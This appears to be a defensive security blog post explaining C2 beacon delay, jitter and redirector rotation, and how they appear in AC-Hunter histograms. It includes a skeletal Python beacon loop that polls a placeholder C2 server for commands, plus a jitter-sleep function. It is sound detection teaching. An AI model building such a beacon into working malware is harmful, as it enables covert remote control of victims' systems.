Malware of the Day – Understanding C2 Beacons – Part 1 of 2
Introduction
In our previous Malware of the Day posts we used specific, fixed Command and Control (C2) beaconing properties to simulate real-world attacks. In doing so we attempted to present them as accurately as possible, that is to say as they would appear were you to encounter these specific attacks out in the wild. These real-world simulations hold tremendous value, but ultimately also have a fundamental limitation: we cannot simulate all possible attacks past, present, and future.
Today, as a complementary educational strategy, we will explore C2 beaconing properties based on first principles. We’ll examine the statistical foundations underpinning C2 beaconing behavior and, critically, seek to understand how this might affect the beacon’s appearance in AC-Hunter. The goal is to empower you to recognize not only what has been, but also what might be.
To serve this educational journey, we’ve decided to break this post into two parts. In this post, Part 1, we’ll start with a basic primer on statistical concepts central to C2 beaconing behavior (Section 1). We’ll then have a quick discussion on C2 beacons in general and explore their foundational properties (Section 2). Finally, we’ll tie these two sections together by examining how changes in core C2 beaconing behaviors affect their statistical properties and, consequently, their appearance in AC-Hunter (Section 3). In the second post, we’ll compare today’s theoretical findings to actual experimental data in AC-Hunter and RITA.
We hope that by exploring these ideas and giving you deeper fundamental insight into the factors influencing the appearance of C2 beacons in RITA/AC-Hunter, we can help keep your organization safe against a wider range of possible attacks.
Section 1: Basic Statistical Primer
1.1. Prelude
To lay the groundwork for our exploration, let’s quickly review some essential statistical concepts. Don’t worry – we’ve distilled this lesson to the bare essentials, focusing only on ideas directly relevant to our discussion. We’ve avoided unnecessary jargon, formulas, and complex terminology. Think of this as a casual conversation about basic logic rather than a formal statistics lesson. This brief overview will ensure we’re all on the same page and ready to dive into the main topic.
1.2. Mean
Let’s start with something we all already know – the mean. The mean is simply another term for average. It’s calculated by summing a series of numbers and then dividing the result by the number of values in the series.
Consider the following example:
We have the series [4, 5, 6].
Our sum is 4 + 5 + 6 = 15.
We have 3 numbers in total.
So our mean is 15 / 3 = 5.
1.3. Mode
The next important foundational term is mode. The mode is simply the value that appears most frequently in a set of numbers.
For example, if we have a set of numbers consisting of 1, 3, 3, 3, 3, and 5, our mode is 3. This is because the number 3 appears four times, which is more frequent than either 1 or 5.
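If you'd like to check these two calculations yourself, Python's built-in statistics module handles both the mean and the mode:

```python
import statistics

print(statistics.mean([4, 5, 6]))           # 5 -> (4 + 5 + 6) / 3
print(statistics.mode([1, 3, 3, 3, 3, 5]))  # 3 -> appears four times
```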
1.4. Percentile
The next important idea is that of percentile, which is a way to understand where a value stands in relation to the others in the same set. It's usually expressed as the "nth percentile," meaning the value is greater than n percent of the values in the set.
For example, if you score in the 90th percentile on a test in a class of 100, you performed better than 90 percent of your classmates. And as mentioned, the real value of a percentile lies in its ability to convey how a value relates to the others in its set.
Consider this: If I say you got a D on a test, it might sound like you did poorly. However, if I add that it’s in the 95th percentile, it means that it was probably a very difficult test, and you did exceptionally well compared to your classmates. Conversely, if I say you got a B+, but were in the 10th percentile, it means 90% of the class did better than you, suggesting it was likely an extremely easy test.
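To make the idea concrete, here's a small Python sketch using a made-up set of ten test scores – the function simply reports what percentage of the scores fall below yours:

```python
def percentile_rank(scores, your_score):
    """Percentage of scores in the set that fall below your score."""
    below = sum(1 for s in scores if s < your_score)
    return 100 * below / len(scores)

# Hypothetical class of ten test scores:
scores = [31, 35, 38, 40, 42, 45, 48, 51, 55, 72]
print(percentile_rank(scores, 72))  # 90.0 -> better than 90% of the class
```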
1.5. Deviation
Next, let’s discuss the concept of deviation, which essentially describes how “spread out” a dataset is. While it’s often expressed as MAD (median absolute deviation), we’ll focus on the general idea rather than technical definitions.
Consider these two sets of numbers:
Set A = [8, 9, 9, 9, 10, 10, 10, 10, 11, 11, 11, 12]
Set B = [3, 4, 4, 4, 10, 10, 10, 10, 16, 16, 16, 17]
If we calculate the mean and mode for these sets, they’re identical for both: 10. Looking at just these measures might give the false impression that the sets are essentially the same. However, we can intuitively see that the numbers in Set A are clustered together, while those in Set B are much further apart.
This difference becomes even clearer if we plot how often each number appears, as shown in Figure 1 below.
As we can see, although both sets have identical mean and mode, Set A is relatively narrow while Set B is relatively broad. We can say that A has a much lower deviation (its numbers deviate less from the mean) than B, which has a higher deviation. So in essence, deviation tells us how spread out (or close together) the values in a set are.
By the way – this type of graph, where we plot certain values on the X (horizontal) axis against the number of times those values appear in a dataset on the Y-axis (vertical), is called a histogram. It’s important to understand this concept as it’s central to how we analyze beaconing behavior – it’s a key feature of AC-Hunter. If you’d like a more in-depth explanation of histograms, please feel free to watch this video.
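Before we move on, you can verify the deviation intuition numerically. The standard library has no built-in MAD function, so this small sketch computes it straight from the definition – the median distance of each value from the median:

```python
from statistics import median

def mad(data):
    """Median absolute deviation: median distance of each value from the median."""
    m = median(data)
    return median(abs(x - m) for x in data)

set_a = [8, 9, 9, 9, 10, 10, 10, 10, 11, 11, 11, 12]
set_b = [3, 4, 4, 4, 10, 10, 10, 10, 16, 16, 16, 17]

print(mad(set_a))  # 1.0 -> values cluster tightly around 10
print(mad(set_b))  # 6.0 -> values are spread much further out
```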
1.6. Skewness
The final concept I want to introduce is skewness – which is essentially a measure of how symmetrical a histogram is. Figure 2 below shows what’s often called a “normal distribution,” or more colloquially, a “bell curve.”
In this perfectly symmetrical graph, a key point to note is that our mean and mode are equal to each other. As we discussed earlier, the mode is the number that appears most frequently, and since a histogram plots frequency, it follows that the highest point on our graph will always be the mode. Because the graph is symmetrical, our mean is exactly in the middle, coinciding with the mode.
Now, let’s consider what would happen if our dataset changed so that most of the data appeared after our mode – see Figure 3 below.
We can see that our graph has become asymmetrical. We say that our skewness has increased, and specifically, our graph now displays positive skew. While our mode is still at the peak (as it always will be), the majority of our data now appears after the mode, causing our mean to shift away from it.
Conversely, when the opposite happens—that is, when the majority of the data appears before our mode—we get what we can see in Figure 4 below.
In this case, we once again have an asymmetrical graph, but instead of the mean following the mode, it now precedes it. This is what we call negative skew.
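To see the effect of skew on these measures, consider a small made-up dataset with a long right tail – the mode stays at the histogram's peak while the mean gets pulled past it:

```python
from statistics import mean, mode

# A positively skewed set: the long tail sits to the right of the mode.
data = [1, 2, 2, 3, 3, 3, 4, 5, 9, 12]
print(mode(data))  # 3   -> still the highest bar in the histogram
print(mean(data))  # 4.4 -> dragged to the right of the mode by the tail
```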
And that’s it – these are all the foundational statistical ideas and terms we need to fully explore C2 beaconing behavior. Now that we’ve laid this foundation, let’s quickly ensure we’re all on the same page regarding C2 beaconing and its most essential properties.
Section 2: C2 Beacons and Their Fundamental Properties
2.1. What Exactly is C2?
As Active Countermeasures COO Chris Brenton is fond of saying: “malware does not break the rules, but bends them.” This principle applies to C2, which can best be thought of as malware that bends the rules of the Client-Server model.
So first – what is a “normal” Client-Server model? In its simplest form, it’s just two systems communicating over a network, typically the internet. Then, based on the relationship each system has to the other in this communication, one will assume the role of client, while the other will be the server.
Let’s consider a scenario where one system is browsing a website and wants to download a particular resource, like a PDF file. This PDF file has to exist somewhere: it has to be stored on the hard drive of some system out there on the internet, and that system has to be able to serve it to other systems that want to download it.
In this scenario:
- The system that wants to download the PDF is our client.
- The system serving the PDF is the server.
For this event to take place, four things will occur:
- The client initiates contact.
- The client and server perform a three-way handshake to establish a connection.
- The client requests the PDF.
- The server responds with the requested PDF.
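To make this concrete, here's what the client's side of the exchange looks like in a minimal Python sketch (the URL is hypothetical) – a single call covers the handshake, the request, and the response:

```python
import urllib.request

URL = "https://example.com/report.pdf"  # hypothetical resource

with urllib.request.urlopen(URL) as resp:  # handshake + request
    pdf_bytes = resp.read()                # server's response: the PDF

print(f"downloaded {len(pdf_bytes)} bytes")
```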
As mentioned earlier, C2 is essentially malware that takes the same Client-Server model but bends the rules. In this case, our client is no longer someone actively browsing the internet using their computer, but an unwitting participant. Their system, infected with malware, reaches out and connects back to a server without the user driving the action. And the server is the interface for the threat actor – it’s under their immediate control.
Just like in our “normal” model, the client (now the infected system) initiates contact with the server, but this time because it’s programmed to do so. The three-way handshake is performed, and the connection is established, similar to the standard process. But this is where things really get interesting.
Instead of requesting a resource like a PDF, the client (infected system) asks the server if it has any instructions (commands) for it. Depending on the server’s response, one of two things can happen:
- If the server has no instructions, the connection is simply terminated.
- If the server does have an instruction, it responds to the client with the command, after which the connection is also terminated.
But since the client is programmed to reach out to the server periodically, it will connect back again after a set amount of time. If it received instructions during the previous connection (for example, to check what processes are running on the local system), it will send the results to the server (typically via a POST method) once the new connection has been established.
This reveals another interesting inversion of the typical Client-Server model: while the server primarily serves instructions (and occasionally other post-exploitation modules/scripts), it’s often the client sending data to the server.
So in essence, C2 is a malicious Client-Server model that uses an unwitting client to execute commands on behalf of, and serve data to, a server under the immediate control of a threat actor. While this explanation strips away nuance and omits exceptions, it serves as a useful guiding principle for understanding C2 operations.
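To illustrate just how simple this inversion is, here's a deliberately skeletal Python sketch of one such client. Everything in it is hypothetical – the server address is a placeholder, and where a real beacon would execute the command and POST the output back on its next check-in, we simply print it:

```python
import time
import urllib.request

C2_URL = "http://203.0.113.10/tasks"  # hypothetical C2 server address
DELAY = 30                            # seconds between check-ins

while True:
    # One round: connect out, ask the server for an instruction, disconnect.
    with urllib.request.urlopen(C2_URL) as resp:
        command = resp.read().decode().strip()
    if command:
        print(f"tasked with: {command}")  # a real beacon would execute this
        # ...and send the output back on the next check-in
    time.sleep(DELAY)  # fixed delay between connections (more on this below)
```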
2.2. What is a C2 Beacon?
A C2 beacon is the malware that transforms an unsuspecting host into an unwitting client. It’s the software running on a victim system that connects back to a C2 server to request instructions, executes those commands, and returns any required output. The beacon forms one half of the C2 system, with the other half called the “C2 server” or, in Cobalt Strike terminology, the “Team Server”.
It’s worth noting that while “beacon” is the preferred term in the Cobalt Strike framework, various frameworks use different terminology. For example:
- Sliver calls them “implants”
- Covenant refers to them as “grunts”
- RATs (Remote Access Trojans) often call them “stubs”
Despite the varied terminology, they all refer to the same concept: the software that turns a host into an unwitting client. Since we’ll be working with Cobalt Strike in this article, we’ll use “beacon” – or “C2 client” when speaking more generally.
2.3. What are the Main Properties of C2 Beacons?
Now, as I already said, the entire C2 process (or rather, a single round of the process) starts with the beacon connecting to the server and requesting instructions. But, as I also said, the client is not under the immediate control of the attacker – meaning the attacker is not sitting directly in front of that host system typing away at the keyboard. The attacker has direct access to the C2 server, and through it, indirect access to the C2 client.
So for the C2 client to “make the first move” – that is, initiate the connection to the C2 server – there needs to be a predetermined method for doing so. In other words, it needs to be pre-programmed.
In early C2 frameworks like Metasploit, this process was straightforward. Once the connection was established, it was maintained continuously. This meant that the attacker only needed to run the initial payload once to create the connection. After that, the connection was maintained and they could send commands to the client at will.
However, as the inevitable evolutionary arms race progressed, it soon became trivial for defenders to identify potential C2 connections by simply spotting connections that ran for days on end. This development forced attackers to innovate, and unsurprisingly, innovate they did.
The first improvement was the shift to periodic connections using delay. Instead of maintaining one long, continuous connection, the client would now:
- Connect to the server
- Ask for an instruction (and possibly send requested data)
- Receive a reply
- Kill that connection
Then, after a set amount of time (i.e., the delay) – let’s say 30 seconds – it would reconnect and repeat the process. This approach eliminated the easily recognizable long-standing connection that defenders could identify. By constantly establishing and killing connections, attackers made their C2 traffic much harder to detect. For the time being, this gave the advantage back to the attackers.
But you might quickly spot another easy way to detect a static delay – the fact that the client connects to the server at a fixed interval. For example, if we were to examine the data after three days, we’d see that local host X made 8,640 connections to external host Y, with each connection occurring exactly 30 seconds apart. This is clearly an unusual pattern, not something we’d expect a typical user to produce. Once again, defenders were able to leverage this fact to their advantage, making it relatively easy to spot C2 activity on a network.
The innovative response to this weakness came in the form of what’s known as jitter, which is essentially a technique to introduce variation into the delay. In addition to selecting a specific delay for a beacon, attackers can now specify a percentage by which this delay should pseudo-randomly vary each time.
For example, let’s say we create a beacon with a delay of 20 seconds and select 50% jitter. Fifty percent of 20 is 10 seconds. Depending on the implementation, that variation may be applied in both directions – giving a range of 10 seconds (20 – 10) to 30 seconds (20 + 10) between subsequent connections – or, as Cobalt Strike does (and as we’ll assume in Section 3), only subtracted from the delay, giving a range of 10 to 20 seconds. Either way, because each subsequent connection has variable timing, it once again becomes harder for defenders to spot the pattern.
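As a minimal sketch, here's that calculation in Python, following the subtract-only convention we'll use in Section 3 – each check-in, the beacon shaves a random fraction (up to the jitter percentage) off the delay:

```python
import random

def next_sleep(delay: float, jitter: float) -> float:
    """Subtract a random 0..jitter fraction of the delay (Cobalt Strike-style)."""
    return delay - random.uniform(0, jitter) * delay

# 20-second delay with 50% jitter: intervals land anywhere in [10, 20] seconds.
print([round(next_sleep(20, 0.50), 1) for _ in range(5)])
```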
While there are numerous more nuanced and advanced techniques for obscuring beaconing even further, for now we’ll focus on just one more dimension in addition to the two core properties of delay and jitter: the use of multiple redirectors and a chosen rotation strategy. To understand this, let’s quickly take a step back and explore exactly what redirectors are.
2.4. What are C2 Redirectors?
So far, we’ve discussed C2 activity as implying a direct connection between the C2 client and server, without any intermediary. While this is a good elementary way to explore the concept, in practice – especially when dealing with more advanced adversaries – the C2 client often first connects outbound to a redirector, which passes the traffic on to the C2 server. Similarly, when the server responds, the reply travels back through the redirector, which completes the loop to the C2 client – see Figure 5 below.
If this idea of a forwarding host sitting between two other systems sounds familiar, it’s because this is essentially a proxy. However, in the context of C2, especially within Cobalt Strike, it’s often called a redirector. While I’ll stick to the term “redirector” for consistency, it’s important to understand that a redirector is fundamentally the same as a proxy.
Without delving too deeply into this topic, it’s valuable to understand why redirectors are employed. We can distill it down to two main reasons: minimizing reactivation energy and resiliency through redundancy.
- Minimizing reactivation energy: This refers to the fact that it’s easier and quicker to create a C2 redirector (often requiring just a single command) than to perform a server swap in a C2 setup. By including a redirector, we ensure that if the C2 connection is discovered, the server’s identity remains hidden. The overall compromise can be salvaged by creating a new redirector, instead of a new server, which is much riskier and more complicated.
- Resiliency through redundancy: Redirectors allow for multiple connections between a single client and server, providing redundancy. As is often the case in information technology, redundancy can create resilience. Should a single connection fail or be discovered, the alternate routes ensure that the overall connection between server and client is maintained. Employing multiple redirectors ensures that the operation doesn’t hinge on a single point of failure.
2.5. C2 Redirector Host Rotation Strategies
When we have multiple redirectors, you can likely deduce that there are different ways, or patterns, we can employ in deciding how to route the communication. This pattern is termed the “host rotation strategy”, and I think the best way to understand it is by way of a simple example. So let’s consider a simple case with only two redirectors between the server and client, creating two paths, A and B – as shown in Figure 6.
While there are other, lesser-known host rotation strategies that we’ll explore in the future, today we’ll focus on the two most common types: round robin and random.
- Round Robin: This strategy is simple and deterministic. It chooses one path, then the other, and repeats the process. In other words, it follows the pattern: A, B, A, B, and so on.
- Random: Unlike the previous strategy, random is non-deterministic. Each time a request is to be sent, it essentially “flips a coin” to decide whether to use path A or B. This means the sequence could be unpredictable, such as: A, A, A, B, A, B, B. Or it could be entirely different, like: B, A, B, B, A, A, B.
Initially, it might seem difficult to detect the random host rotation strategy due to its non-deterministic nature. However, even if the exact pattern is near-impossible to determine, we can predict with a high level of accuracy how often we’d expect each path to be used, due to the symmetrical outcome probabilities (50/50). This becomes especially true as the sample size increases; the outcome in terms of frequency becomes increasingly predictable.
The coin-flipping analogy is indeed an excellent model for understanding this concept. In both cases, there’s always a choice between one of two outcomes, and present outcomes are independent of past ones. If you flip a coin twice, it might randomly land heads twice – not an unlikely outcome. In this case, heads occurred 100% of the time, and tails 0%.
However, if you flip a coin 1 million times, the chances of it landing only on heads 1 million times is virtually nil. Rather, it will gravitate towards each outcome (heads and tails) occurring about 500,000 times, or 50% each. So despite the fact that we are unable to predict the exact path it takes to get there, we can predict with a high degree of confidence where it will end up.
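A quick simulation makes this convergence concrete – with a fair 50/50 choice between paths A and B, small samples wander, but large samples settle right at 50%:

```python
import random
from collections import Counter

random.seed(1)  # reproducible run
for flips in (10, 1_000, 1_000_000):
    counts = Counter(random.choice("AB") for _ in range(flips))
    print(f"{flips:>9} flips: path A used {counts['A'] / flips:.1%} of the time")
```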
We’ve now reached the point where we can tie everything together – the statistical concepts we learned at the start with the various properties of beacons we’ve just discussed. In the coming section, we’ll explore how variations in beacon properties affect the various statistical properties.
Section 3: How Changes in C2 Beacons Affect Their Statistical Properties
3.1. Changes in Delay
Since we’ll explore all changes relative to one another, let’s first define our “base” histogram – as shown in Figure 7 below.
The symbols on the X-axis might seem a little overwhelming at first, but stick with me for just a moment and I promise it will all soon make perfect sense.
As explained in the previous section, when we apply jitter (j) to a beacon in Cobalt Strike, a random amount of time – up to that fraction of the delay (D) – is subtracted from the delay, and this determines the range of values the connection interval can assume.
Thus, as can be seen in the image above, the maximum value our histogram will have on the x-axis is D (i.e. the delay), while the minimum value is the delay minus the delay times the jitter (expressed as a fraction). Mathematically we can express this minimum value as D – Dj, which may be rewritten as D*(1-j).
Further, as mentioned before, the highest point on our histogram will always be the mode, here represented by the symbol Mo. Since Mo sits exactly halfway between D(1-j) and D, its value is D – (Dj/2), which in turn can be rewritten as D*(2-j)/2.
To recap then, our minimum range value, maximum range value, and mode can be determined with:
- Minimum Range Value = D*(1-j)
- Mode = D*(2-j)/2
- Maximum Range Value = D
And to solidify this, let’s quickly apply these formulas to a simple example with a delay of 40 seconds (D = 40) and jitter of 25% (j = 0.25).
Minimum Range Value = 40*(1 – 0.25) = 30.
Mode = (40*(2 – 0.25))/2 = 35.
Maximum Range Value = 40.
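If you'd like to sanity-check these formulas programmatically, here's a tiny Python helper that reproduces the worked example above:

```python
def interval_range(delay: float, jitter: float):
    """Min, mode, and max of the connection interval for a given delay and jitter."""
    return delay * (1 - jitter), delay * (2 - jitter) / 2, delay

print(interval_range(40, 0.25))  # (30.0, 35.0, 40)
```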
So as far as our base histogram goes, those are the three important values on the x-axis and how we can calculate them. On the y-axis, we have the number of times we observed a connection at a given interval, with the peak frequency represented by n. And since this is a perfectly symmetrical bell curve, it follows that our mean is equal to our mode.
Now, let’s consider what happens if we double our delay to 2D. As shown in Figure 8 below, two immediate changes are apparent.
The first change is obvious and expected – our entire bell curve shifts to the right since the delay (and thus mode) is twice as large as it was before. Consequently, our minimum and maximum range values, as well as our mode, will now double to 60 (min), 70 (mode), and 80 (max) respectively.
The second change we can see is that, within the same timeframe, the frequency of occurrence will halve (n/2).
This second change occurs because there’s an inverse relationship between delay and the number of times we can expect to see that connection in any given time period. For example:
- If our delay is 30 seconds, in 1 hour we’ll expect to see it a maximum of 120 times. (Note: I say maximum because it will actually be quite a bit less due to jitter spreading our connections out over multiple values. However, it could never be more than 120.)
- If we double our delay to 60 seconds, we’d expect to see it a maximum of 60 times in the same 1-hour period.
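Here's that ceiling expressed as a quick Python calculation – the bound is simply the window length divided by the delay, and jitter only ever lowers the real count below it:

```python
def max_hourly_connections(delay_seconds: float) -> int:
    """Upper bound on check-ins per hour; jitter only ever lowers the real count."""
    return int(3600 // delay_seconds)

print(max_hourly_connections(30))  # 120
print(max_hourly_connections(60))  # 60 -> doubling the delay halves the ceiling
```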
Now, let’s consider what happens if we do the opposite and halve our delay to 0.5D. As expected, we see the reverse effects – as shown in Figure 9 below.
Our curve now shifts to the left as our minimum and maximum range values, as well as our mode, also halve. And since the wait between subsequent connections is now half as long, in any given time period we’d expect the total number of connections to double (2n).
Please note that though the height of our graph changes (due to the increase/decrease in n), the shape of our graph does not. This is because the width and height change in fixed proportion to each other. The shape of the histogram is primarily influenced by jitter, which was kept fixed in this example.
3.2. Changes in Jitter
Next, let’s consider the scenario where our delay remains fixed, but we vary our jitter. We’ll once again use the histogram from Figure 7 as our baseline.
First, let’s examine what happens when we increase jitter – as shown in Figure 10.
Several key observations can be made about the effect of increasing jitter. First, since we are only changing jitter and not delay, our maximum range value (which, of course, equals the delay) does not change. It’s as if the right side of our histogram is anchored to a fixed point, and changes in jitter simply stretch the graph to the left relative to that anchor.
As a consequence, a change in jitter alters the shape of our graph significantly – it’s as if someone grabbed the left side of the graph and pulled it further left, “flattening” out the curve.
As a result, our graph becomes broader. This should sound familiar – it’s a description of what happens when deviation increases. By increasing jitter, our values spread out over a larger range, deviating more from the central value.
Accompanying this change in the width of the graph is a decrease in the maximum frequency it can attain. This makes sense intuitively: since our connections are now spread out over a larger range, the probability of a connection falling exactly on the central value decreases.
Conversely, if we were to decrease jitter, we’d see the opposite changes take place, as illustrated in Figure 11 below.
When we decrease jitter, our graph becomes noticeably narrower. This occurs because the connections are now spread out over a smaller range of possible numbers. As a consequence, the maximum possible frequency of our mode increases.
Again, this makes intuitive sense: with fewer values that the connections can assume, there’s a higher probability that any given connection will fall exactly on the mode.
Finally, let’s consider one more scenario: what happens if we remove jitter altogether? While this is less common in modern attacks, it’s certainly not impossible and thus important to be aware of.
Let’s think this through. If the delay is a certain value, say 20 seconds, and there is no jitter, we won’t see a bell curve any longer. Instead, since all the values fall on a single point, we’ll expect to see a single bar exactly at 20 seconds, as illustrated in Figure 12 below.
In this case, since our entire graph is on a single point, it also means that mode and delay are equal to one another – in this example they would both be 20.
Further, we can predict our frequency of occurrence with much greater accuracy. In this example (with a delay of 20 seconds), we’d expect to see 3 connections in a minute, and thus 180 connections in an hour. And since all the values are now exactly 20 seconds apart and not spread out, that’s the actual value we’d expect to see.
3.3. Employing a Round Robin Host Rotation Strategy
As mentioned earlier, with a round robin rotation strategy, the connections rotate one by one in a deterministic manner between each redirector. If we have two redirectors, this effectively doubles the delay for each individual redirector.
Let’s consider an example: Say our delay is 10 seconds. The sequence would go like this:
- Connect via redirector A
- Wait 10 seconds
- Connect via redirector B
- Wait 10 seconds
- Connect via redirector A again
As we can see, the time that passes between subsequent connections via the same redirector is now 20 seconds. So effectively, the graph that results for each individual redirector is the same as what we’d see if we were to double the delay (as shown in Figure 8 above) with a single (or no) redirector.
The key takeaway for the round robin host rotation strategy is this: take the delay and multiply it by the number of redirectors. So if an attacker were using four redirectors with a delay of 20 seconds, the graph for each individual redirector would be identical to that of a single redirector (or no redirector) with a delay of 80 seconds.
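Here's a toy simulation of that takeaway, using four hypothetical redirectors and a 20-second delay – every per-redirector gap comes out to 20 * 4 = 80 seconds:

```python
DELAY = 20
REDIRECTORS = ["A", "B", "C", "D"]  # four hypothetical redirectors

# Round robin: connection i goes through redirector i mod 4.
times = {r: [] for r in REDIRECTORS}
for i in range(12):
    times[REDIRECTORS[i % len(REDIRECTORS)]].append(i * DELAY)

for r, ts in times.items():
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    print(r, gaps)  # [80, 80] for each redirector: DELAY * len(REDIRECTORS)
```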
3.4. Employing a Random Host Rotation Strategy
When we consider the randomized host rotation strategy, things become much more interesting. As mentioned earlier, with two redirectors we can model this strategy perfectly as a coin flip.
In a coin flip, there’s an equal 50% chance of landing on either heads or tails. Crucially, each flip is independent – past events have no influence on future outcomes. Every single time you flip a coin, either result has exactly a 50% chance of happening, regardless of previous outcomes.
The probability becomes more intriguing when we consider consecutive outcomes. The chance of getting heads twice in a row is 25% (0.50 * 0.50 = 0.25), and three times in a row is 12.5% (0.50 * 0.50 * 0.50 = 0.125).
So with each repetition, the chance of consecutively landing on the same side – that is to say, the odds of the same redirector being randomly selected yet again – is halved. Now let’s connect this to our histogram – see Figure 13 below.
In this graph, we can see our intervals as D, 2D, 3D (i.e., whole multiples of our delay) on the x-axis. Correspondingly, on the y-axis, we observe that the probable frequency of occurrence halves for each consecutive delay (n/2, n/4, n/8). This aligns perfectly with what we would expect according to the “coin flip” model we just discussed.
The shape of this graph is likely familiar, as it’s no longer symmetrical but shows positive skew, or a “long tail”. As a consequence, even though our mode is still represented by D (our delay), the mean has now shifted to the right and is no longer equal to the mode.
It’s important to note that this example, where our bars line up perfectly with whole multiples of our delay, reflects a case without any jitter. The introduction of jitter maintains the overall shape but adds another layer of complexity to this scenario. However, to avoid confusion in this theoretical discussion, we’ve decided to only explore those changes in Part 2, where we’ll examine actual results from AC-Hunter.
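As a small preview of what Part 2 will measure, here's a quick no-jitter simulation of the random strategy. Looking only at connections routed through redirector A, the gaps between consecutive sightings land on whole multiples of the delay, with each successive multiple occurring about half as often:

```python
import random
from collections import Counter

random.seed(7)  # reproducible run
DELAY, N = 10, 100_000  # 10-second delay, 100k check-ins, no jitter

# Times at which the beacon happens to route through redirector A.
times_a = [i * DELAY for i in range(N) if random.choice("AB") == "A"]

# Gaps between consecutive A-connections, in multiples of the delay.
gaps = Counter((b - a) // DELAY for a, b in zip(times_a, times_a[1:]))
total = sum(gaps.values())
for k in sorted(gaps)[:4]:
    print(f"gap of {k}D: {gaps[k] / total:.3f}")  # ~0.500, 0.250, 0.125, 0.063
```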
Conclusion
Today’s Malware of the Day report provided an in-depth theoretical exploration of the fundamental properties of C2 beacons, related statistical concepts, and how altering these properties would affect their appearance in AC-Hunter.
Specifically, we:
- Explored the statistical concepts of mean, mode, percentile, deviation, and skewness
- Examined C2 frameworks and beacons
- Discussed delay and jitter in relation to C2 beacons
- Explored C2 redirectors and the two most common host rotation strategies – round robin and random
- Analyzed how changes in delay would affect the histogram in AC-Hunter
- Investigated how changes in jitter would affect the histogram in AC-Hunter
- Examined how employing either a round robin or random host rotation strategy with multiple redirectors would affect the histogram in AC-Hunter
While we hope today’s theoretical journey served a useful educational goal, it’s primarily a prelude to the following part, where we’ll review actual datasets to observe first-hand the effects of changing C2 beaconing properties. By first laying a solid theoretical foundation and then reinforcing those concepts with findings from actual compromises, we aim to help you become proficient at harnessing the full potential of AC-Hunter.
We’ll conclude with a reminder: developing a lucid and in-depth understanding of C2 beaconing properties and their potential appearances in AC-Hunter will enable you to ensure that your organization remains protected against these types of attacks. We’re grateful to be on this journey together to ensure your organization remains safe and secure.
Capture Files
Proceed to Part 2 for PCAPs and Zeek log capture files.
Faan has a profound love for the natural world, technology, design, and retro aesthetics. He is incredibly grateful to have discovered cybersecurity as a path relatively late in his life, and his main interests are threat hunting and post-exploitation custom tooling, in particular C2 frameworks and RATs.